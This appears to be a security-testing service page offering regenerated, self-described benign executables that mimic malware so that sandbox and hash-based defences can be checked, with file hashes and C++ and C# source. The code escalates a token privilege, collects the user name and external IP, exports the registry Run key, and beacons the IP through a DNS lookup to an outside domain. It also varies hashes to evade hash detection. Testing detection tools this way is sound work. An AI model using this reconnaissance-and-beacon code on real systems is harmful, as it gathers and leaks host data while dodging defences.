Download this file on the target computer and investigate in the security tools.
Hash based tools should not detect it.
Sandbox tools should detonate and detect.
If you have an inline realtime blocking tool, this file should not get delivered.
* Demonstrate the value of real time detonation vs hash based technologies.
* Test your deployment, 1 click proves that the integrations are talking together
* Use over HTTPs to test decryption configurations
File | MD5 Hash | Created | Size |
---|---|---|---|
malware_eicar_cpayne_1736932652.exe | a54390dd8aa4804c596e9dbb96a3aa08 | January 15 2025 09:17:33 GMT | 4775532 bytes |
malware_eicar_cpayne_1736932631.exe | 85855656b0d8ac1224b913bf78031fac | January 15 2025 09:17:12 GMT | 4775532 bytes |
malware_eicar_cpayne_1736932611.exe | 3a5218a9c9db114726d4ed9ba043d153 | January 15 2025 09:16:52 GMT | 4775532 bytes |
malware_eicar_cpayne_1736915302.exe | d90737589230971ee045427390d0ba41 | January 15 2025 04:28:23 GMT | 4775532 bytes |
malware_eicar_cpayne_1736845146.exe | baeb3027cb880cf0a8ed136514d1e4b3 | January 14 2025 08:59:07 GMT | 4775532 bytes |
malware_eicar_cpayne_1736799360.exe | 943d0dfc5b846f32aaced62642f81d97 | January 13 2025 20:16:01 GMT | 4775532 bytes |
malware_eicar_cpayne_1736780074.exe | 0a5c452ba3a7bd962de44e1685eca9c0 | January 13 2025 14:54:35 GMT | 4775532 bytes |
malware_eicar_cpayne_1736746737.exe | 1f3da99260cabc04f90ee99c8604e6fe | January 13 2025 05:38:58 GMT | 4775532 bytes |
malware_eicar_cpayne_1736737371.exe | 5bd5189a427c2952582cbb5c8c01517f | January 13 2025 03:02:52 GMT | 4775532 bytes |
malware_eicar_cpayne_1736737360.exe | 556b2da375ccf8e742d8bf9f2297f70f | January 13 2025 03:02:41 GMT | 4775532 bytes |
> #cat /path/malware_eicar.cs
/*
MAATrigger-Payload - John Payne
------------------------
Windows C++ executable - once executed it will perform the following,
closly matching original C# code. Targeted for Windows 7+ operating systems
What this code does:
- Gain privs to allow registry access
- Connects to bot.whatismyipaddress.com & and get IP
- Get current Windows user
- Write IP and Windows user to file (current DIR\drop.txt)
- Export registry keys to file (current DIR\export.reg)
- Create mutex "1234-7" - red flag in MAA
- Sleep for 60000ms
*/
#include
#include
#include "windows.h" // C++ Windows API
#include
#pragma comment(lib, "Ws2_32.lib") // winsock2 libary
using namespace std;
bool gainPriv();
int main() {
cout << "Blessings Payload Application\n";
/* Gain the neccessary priv's to perform admin functions on Windows
------------------------------------------------------------------*/
cout << "Escalating privileges if possible...\n";
if (gainPriv()) {
cout << "Privileges escalated successfully.\n";
}
else {
cout << "Could not escalate privileges. Likely running as locked down user with limited OS access, or other security mechanisms in place.\n";
}
/* located external IP address. Note very little error checking here
------------------------------------------------------------------ */
WSADATA wsaData;
sockaddr_in serverInfo;
char request[] = "GET / HTTP/1.0\r\nHost: bot.whatismyipaddress.com\r\nUser-Agent: Blessings\r\nConnection: Close\r\n\r\n";
char recvBuf[512] = "";
serverInfo.sin_family = AF_INET;
serverInfo.sin_addr.s_addr = inet_addr("66.171.248.178"); // bot.whatismyipaddress.com
serverInfo.sin_port = htons(80);
int err = WSAStartup(MAKEWORD(2,2), &wsaData);
int sockfd = ::socket(AF_INET, SOCK_STREAM, 0);
err = ::connect(sockfd, (SOCKADDR *)&serverInfo, sizeof(serverInfo));
err = ::send(sockfd, request, (int)strlen(request), 0);
// recv loop, server *Should* respect the Connection: close header so this can be kept simple
do {
err = recv(sockfd, recvBuf, 512, 0);
if (err > 0)
cout << "Recieved " << err << "OK.\n";
else if (err == 0)
cout << "Connection gracefully closed.\n";
else
cout << "Something went wrong with recv()\n";
} while (err > 0);
WSACleanup();
/* Get Windows Username
------------------------------------------------------------------*/
char currentUser[128];
DWORD userSize = 512;
int ret = GetUserNameA(currentUser, &userSize);
if (ret == 0) {
cout << "Error with username: " << GetLastError() << endl;
}
cout << "Current user is " << currentUser << endl;
/* Write IP and username to a file
------------------------------------------------------------------*/
ofstream outFile;
outFile.open("drop.txt", ios::out);
outFile << "Dropped by MAATrigger-Payload\nUsername: " << currentUser << endl;
outFile << "External IP: " << recvBuf << endl;
outFile.close();
/* perform registry query and export to current DIR\export.reg
------------------------------------------------------------------*/
REGSAM regAccess = KEY_READ;
HKEY keyResult;
LONG lresult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, regAccess, &keyResult);
if (lresult == ERROR_SUCCESS) {
cout << "Opened key OK.\n";
}
else {
cout << "Failed to open key.\n";
}
LONG saveResult = RegSaveKeyEx(keyResult, TEXT("export.reg"), NULL, REG_STANDARD_FORMAT);
if (saveResult == ERROR_SUCCESS) {
cout << "Saved keys OK.\n";
}
else {
cout << "Failed to save keys. Error " << saveResult << endl;
}
/* Create Windows Mutex
------------------------------------------------------------------*/
HANDLE mytex = CreateMutex(NULL, TRUE, "1234-7");
if (mytex == NULL) {
cout << "Error creating mutex.\n";
}
else {
cout << "Mutex created OK.\n";
}
ReleaseMutex(mytex);
/* perform sleep for 60 seconds
------------------------------------------------------------------*/
Sleep(60000);
// all done!
return 0;
}
bool gainPriv() {
HANDLE hToken = NULL;
TOKEN_PRIVILEGES newState;
LUID luid;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
cout << "Failed OpenProcessToken.\n";
return false;
}
if (!LookupPrivilegeValue(NULL, SE_BACKUP_NAME, &luid))
{
CloseHandle(hToken);
printf("Failed LookupPrivilegeValue\n");
return false;
}
newState.PrivilegeCount = 1;
newState.Privileges[0].Luid = luid;
newState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Adjust the token privilege.
if (!AdjustTokenPrivileges(hToken, FALSE, &newState, 0, NULL, NULL))
{
printf("Failed AdjustTokenPrivileges\n");
return false;
}
// Close the handle.
CloseHandle(hToken);
return true;
}
Download this file on the target computer and investigate in the security tools.
Hash based tools should not detect it.
Sandbox tools should detonate and detect.
If you have an inline realtime blocking tool, this file should not get delivered.
* Demonstrate the value of real time detonation vs hash based technologies.
* Test your deployment, 1 click proves that the integrations are talking together
* Use over HTTPs to test decryption configurations
File | MD5 Hash | Created | Size |
---|---|---|---|
malware_eicar_csharp_1736932655.exe | 8a15aa4c2b9a603f9bc0f72dbfff3aa2 | January 15 2025 09:17:35 GMT | 5120 bytes |
malware_eicar_csharp_1736932634.exe | c74a4a109f04b5f98734c40b50417927 | January 15 2025 09:17:14 GMT | 5120 bytes |
malware_eicar_csharp_1736932613.exe | 633292da09aad7f8e1178d46e81e9af8 | January 15 2025 09:16:54 GMT | 5120 bytes |
malware_eicar_csharp_1736915309.exe | 1b40bf5d70609a0d4f18f6597196e53d | January 15 2025 04:28:30 GMT | 5120 bytes |
malware_eicar_csharp_1736845140.exe | 3f07b6956d09b4155b6f8d52cd8444c2 | January 14 2025 08:59:00 GMT | 5120 bytes |
malware_eicar_csharp_1736807361.exe | f5d43ac1993cdaca9763583427546760 | January 13 2025 22:29:21 GMT | 5120 bytes |
malware_eicar_csharp_1736780053.exe | 2c502e18709a2757556c863d2e947ad3 | January 13 2025 14:54:14 GMT | 5120 bytes |
malware_eicar_csharp_1736746723.exe | d609d31a11d133d777c030cc22cd4e98 | January 13 2025 05:38:44 GMT | 5120 bytes |
malware_eicar_csharp_1736737393.exe | a6df0fe2ebf253f76b08cde3949e6159 | January 13 2025 03:03:14 GMT | 5120 bytes |
malware_eicar_csharp_1736737350.exe | 02cbc8ec4c1a2b0b04750c25e92b1ea4 | January 13 2025 03:02:31 GMT | 5120 bytes |
> #cat /path/malware_eicar.cs
using System;
using System.Net;
using System.Web;
using System.Text;
using System.Text.RegularExpressions;
using System.Diagnostics;
using System.ComponentModel;
namespace blessings.Mono.Eicar
{
public class HelloMalware
{
public static void Main(string[] args)
{
Console.Write("I'm up to no good");
Console.Write("dynamic=ffc89310d674302ab4c8745409994bf9"); //Hash derived from system clock to keep exe hash changing
WebClient webClient = new WebClient();
byte[] myIp = webClient.DownloadData("http://bot.whatismyipaddress.com/");
string[] output = new string[5];
output[0] = System.Text.Encoding.Default.GetString(myIp);
output[1] = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
System.IO.File.WriteAllLines(@"./scraped_info.txt",output) ;
System.IO.File.WriteAllText(@"./fake_rasauto32.dll",":)") ;
Export(@".\export.reg", @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run");
IPHostEntry hostInfo = Dns.GetHostEntry(output[0]+".infected.7blessings.co.uk");
System.Threading.Mutex _mutey = null;
_mutey = new System.Threading.Mutex(false, "1234-7");
Console.Write(System.Environment.NewLine+"Finished");
Console.ReadLine();
System.Threading.Thread.Sleep(60000);
}
private static void Export(string exportPath, string registryPath)
{
string path = "\""+ exportPath + "\"";
string key = "\""+ registryPath + "\"";
Process proc = new Process();
try
{
proc.StartInfo.FileName = "regedit.exe";
proc.StartInfo.UseShellExecute = false;
proc = Process.Start("regedit.exe", "/e " + path + " "+ key);
proc.WaitForExit();
}
catch (Exception)
{
proc.Dispose();
}
}
}
}
Many thanks to https://github.com/a0rtega/pafish for your work!
Generated 100% benign compiled exe that mimics behaviour actions of genuine malware. As the malware is generated frequently, the hash should already not be known to any security tool.
This tool differs from the above as it detonates in a Sandbox, and not the full iVM making it ideal for testing and showing MASS.
Download this file on the target computer and investigate in the security tools.
Hash based tools should not detect it.
Sandbox tools should detonate and detect.
If you have an inline realtime blocking tool, this file should not get delivered.
* Demonstrate the value of real time detonation vs hash based technologies.
* Demonstrate security delivere to devices using Cloud proxy
* Use over HTTPs to test decryption configurations
File | MD5 Hash | Created | Size |
---|---|---|---|
pafish_appendedepoch_1736932669.exe | 937cc3579411bd65a46c070c401b999c | January 15 2025 09:17:48 GMT | 76811 bytes |
pafish_appendedepoch_1736932648.exe | 593ea861b0ad0220833eb0de8054753f | January 15 2025 09:17:28 GMT | 76811 bytes |
pafish_appendedepoch_1736932628.exe | 9e0d797fd3e782608f3c1fbdd7011378 | January 15 2025 09:17:08 GMT | 76811 bytes |
pafish_appendedepoch_1736925939.exe | 1c8cdb9847601ec4f1375f10c4015201 | January 15 2025 07:25:39 GMT | 76811 bytes |
pafish_appendedepoch_1736925106.exe | 2c374177c810230485f45d41d79f1ca1 | January 15 2025 07:11:46 GMT | 76811 bytes |
pafish_appendedepoch_1736915375.exe | 814f8c7fd7394059dc6a19ab18e15763 | January 15 2025 04:29:35 GMT | 76811 bytes |
pafish_appendedepoch_1736910402.exe | 4f6b2be8b0759a9a0a195da95a8cb8e1 | January 15 2025 03:06:42 GMT | 76811 bytes |
pafish_appendedepoch_1736910053.exe | 7cae7431da557b0952deff701c377dd3 | January 15 2025 03:00:53 GMT | 76811 bytes |
pafish_appendedepoch_1736908677.exe | 83e30198af8962d336df869eec8ccf57 | January 15 2025 02:37:57 GMT | 76811 bytes |
pafish_appendedepoch_1736908674.exe | 892f5d5a62557dedb8c4d997cf5f4de6 | January 15 2025 02:37:54 GMT | 76811 bytes |